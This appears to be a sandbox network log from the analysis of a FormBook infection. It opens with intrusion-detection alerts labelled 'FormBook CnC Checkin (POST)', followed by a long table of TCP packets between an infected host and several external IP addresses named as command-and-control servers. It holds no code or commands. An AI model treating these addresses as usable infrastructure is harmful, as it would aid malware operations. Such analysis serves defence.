2024-09-03T10:45:51.371433+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65004 | 80 | 192.168.2.4 | 3.33.130.190
2024-09-03T10:46:40.500505+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65016 | 80 | 192.168.2.4 | 85.159.66.93
2024-09-03T10:46:07.584283+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65009 | 80 | 192.168.2.4 | 218.247.68.184
2024-09-03T10:45:52.847260+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65005 | 80 | 192.168.2.4 | 3.33.130.190
2024-09-03T10:46:56.818565+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65021 | 80 | 192.168.2.4 | 188.114.97.3
2024-09-03T10:44:47.032770+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64993 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T10:43:47.542947+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64975 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T10:46:21.417014+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65013 | 80 | 192.168.2.4 | 13.248.169.48
2024-09-03T10:44:04.255956+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64980 | 80 | 192.168.2.4 | 154.23.184.240
2024-09-03T10:45:37.169364+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65000 | 80 | 192.168.2.4 | 161.97.168.245
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Sep 3, 2024 10:44:46.589379072 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032680988 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032713890 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032769918 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:47.032792091 CEST8064993199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:47.032841921 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:48.090120077 CEST6499380192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.109425068 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.114343882 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.114418983 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.123464108 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.128364086 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.740858078 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.740905046 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.740916014 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.741106987 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.741156101 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:44:49.742402077 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.746311903 CEST6499480192.168.2.4199.59.243.226
                        Sep 3, 2024 10:44:49.751049995 CEST8064994199.59.243.226192.168.2.4
                        Sep 3, 2024 10:45:02.952416897 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:02.958704948 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:02.958909035 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:02.977329969 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:02.983841896 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:04.484355927 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:04.532448053 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:05.501224041 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:05.506175995 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:05.506232023 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:05.518990040 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:05.524131060 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:07.030105114 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:07.080043077 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.046056986 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:08.050879002 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.050955057 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:08.061650038 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:08.066593885 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066603899 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066612959 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066665888 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066715002 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066724062 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066740036 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066749096 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:08.066807032 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:09.012232065 CEST80649965.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:09.012356043 CEST6499680192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:09.574570894 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:09.619977951 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:10.592971087 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:10.597871065 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:10.597945929 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:10.606331110 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:10.611222982 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:12.494844913 CEST80649955.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:12.498529911 CEST6499580192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:17.805140018 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:17.805191994 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:17.806251049 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:17.806296110 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:18.030458927 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:18.030503988 CEST6499780192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:18.031338930 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:18.035782099 CEST80649975.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:20.394939899 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:20.395119905 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:20.395179987 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:20.397368908 CEST6499880192.168.2.45.144.130.52
                        Sep 3, 2024 10:45:20.402089119 CEST80649985.144.130.52192.168.2.4
                        Sep 3, 2024 10:45:33.998233080 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.003540993 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.003601074 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.016371965 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.021184921 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598315954 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598408937 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598530054 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:34.598552942 CEST8064999161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:34.598602057 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:35.527631044 CEST6499980192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.561783075 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.566713095 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:36.570483923 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.582380056 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:36.588871956 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169241905 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169294119 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169363976 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:37.169419050 CEST8065000161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:37.169528008 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:38.092219114 CEST6500080192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.108536005 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.113651037 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.113763094 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.124440908 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.129358053 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129368067 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129378080 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129462004 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129511118 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129525900 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129544020 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129553080 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.129579067 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.695467949 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.695763111 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.695804119 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:39.776156902 CEST8065001161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:39.776206017 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:40.640517950 CEST6500180192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.656864882 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.665982008 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:41.666050911 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.674700022 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:41.679595947 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270127058 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270142078 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270152092 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270163059 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270172119 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270205975 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:42.270262957 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:42.270297050 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:42.274518013 CEST6500280192.168.2.4161.97.168.245
                        Sep 3, 2024 10:45:42.279278994 CEST8065002161.97.168.245192.168.2.4
                        Sep 3, 2024 10:45:47.301105976 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:47.305993080 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:47.306335926 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:47.317398071 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:47.322393894 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:47.751764059 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:47.751812935 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:48.824516058 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.137396097 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.752388954 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:49.752405882 CEST80650033.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:49.752526045 CEST6500380192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.844386101 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.849303007 CEST80650043.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:49.849365950 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.862255096 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:49.867731094 CEST80650043.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:51.371433020 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:51.377053022 CEST80650043.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:51.381829977 CEST6500480192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.390779018 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.401364088 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.401441097 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.414859056 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:52.421091080 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421101093 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421109915 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421119928 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421133041 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421140909 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421155930 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421164989 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.421173096 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.847122908 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:52.847259998 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:53.918350935 CEST6500580192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:53.923403978 CEST80650053.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:54.936706066 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:54.941749096 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:54.945386887 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:54.952425957 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:54.957216978 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:55.388154984 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:55.388233900 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:45:55.388442993 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:55.390738010 CEST6500680192.168.2.43.33.130.190
                        Sep 3, 2024 10:45:55.395747900 CEST80650063.33.130.190192.168.2.4
                        Sep 3, 2024 10:46:01.259649992 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:01.264470100 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:01.264709949 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:01.274671078 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:01.279572964 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214585066 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214606047 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214617968 CEST8065007218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:02.214732885 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:02.777811050 CEST6500780192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.797317028 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.802196980 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:03.802300930 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.816143990 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:03.821019888 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760212898 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760230064 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760240078 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760258913 CEST8065008218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:04.760329962 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:05.326414108 CEST6500880192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.342995882 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.348059893 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.348149061 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.358516932 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:06.364630938 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364641905 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364650011 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364653111 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364661932 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364670992 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364685059 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364694118 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:06.364702940 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584222078 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584239006 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584252119 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584263086 CEST8065009218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:07.584283113 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:07.584315062 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:07.871419907 CEST6500980192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.892433882 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.898283958 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:08.901439905 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.910420895 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:08.916677952 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873079062 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873096943 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873106956 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873119116 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873128891 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873142004 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:09.873236895 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:09.873266935 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:09.878377914 CEST6501080192.168.2.4218.247.68.184
                        Sep 3, 2024 10:46:09.883152962 CEST8065010218.247.68.184192.168.2.4
                        Sep 3, 2024 10:46:15.628159046 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:15.634649992 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:15.634716988 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:15.750397921 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:15.755393028 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:16.082032919 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:16.082123995 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:17.262085915 CEST6501180192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:17.267206907 CEST806501113.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.361733913 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:18.367186069 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.367253065 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:18.400696993 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:18.405704021 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.921907902 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:18.924551964 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:19.918304920 CEST6501280192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:19.923537016 CEST806501213.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.936418056 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:20.941997051 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.942147970 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:20.992312908 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:20.998146057 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998178959 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998240948 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998251915 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998265028 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998274088 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998337030 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998344898 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:20.998352051 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:21.416824102 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:21.417013884 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:22.512120962 CEST6501380192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:22.517118931 CEST806501313.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:23.534440994 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:23.539525986 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:23.542526960 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:23.549416065 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:23.554250002 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:24.035274029 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:24.035291910 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:24.035408020 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:24.077847958 CEST6501480192.168.2.413.248.169.48
                        Sep 3, 2024 10:46:24.082673073 CEST806501413.248.169.48192.168.2.4
                        Sep 3, 2024 10:46:37.262948990 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:37.267793894 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.270528078 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:37.280910969 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:37.285695076 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.934391975 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.934467077 CEST806501585.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:37.934520006 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:38.804158926 CEST6501580192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.812432051 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.817373037 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:39.817441940 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.831772089 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:39.836649895 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:40.500349998 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:40.500456095 CEST806501685.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:40.500504971 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:41.340228081 CEST6501680192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.359532118 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.364423990 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.364497900 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.378850937 CEST6501780192.168.2.485.159.66.93
                        Sep 3, 2024 10:46:42.383708000 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383718014 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383748055 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383760929 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383771896 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383920908 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.383929014 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.384013891 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:42.384021997 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:43.036572933 CEST806501785.159.66.93192.168.2.4
                        Sep 3, 2024 10:46:43.036608934 CEST | 80 | 65017 | 85.159.66.93 | 192.168.2.4
                        Sep 3, 2024 10:46:43.036727905 CEST | 65017 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:43.887161016 CEST | 65017 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:44.906467915 CEST | 65018 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:44.911344051 CEST | 80 | 65018 | 85.159.66.93 | 192.168.2.4
                        Sep 3, 2024 10:46:44.914568901 CEST | 65018 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:44.921449900 CEST | 65018 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:44.926254034 CEST | 80 | 65018 | 85.159.66.93 | 192.168.2.4
                        Sep 3, 2024 10:46:45.583260059 CEST | 80 | 65018 | 85.159.66.93 | 192.168.2.4
                        Sep 3, 2024 10:46:45.583384991 CEST | 80 | 65018 | 85.159.66.93 | 192.168.2.4
                        Sep 3, 2024 10:46:45.584688902 CEST | 65018 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:45.588485003 CEST | 65018 | 80 | 192.168.2.4 | 85.159.66.93
                        Sep 3, 2024 10:46:45.593544960 CEST | 80 | 65018 | 85.159.66.93 | 192.168.2.4
                        Sep 3, 2024 10:46:50.747379065 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:50.752306938 CEST | 80 | 65019 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:50.757488012 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:50.765615940 CEST | 65019 | 80 | 192.168.2.4 | 188.114.97.3
                        Sep 3, 2024 10:46:50.770431995 CEST | 80 | 65019 | 188.114.97.3 | 192.168.2.4
                        Sep 3, 2024 10:46:51.843858957 CEST | 80 | 65019 | 188.114.97.3 | 192.168.2.4
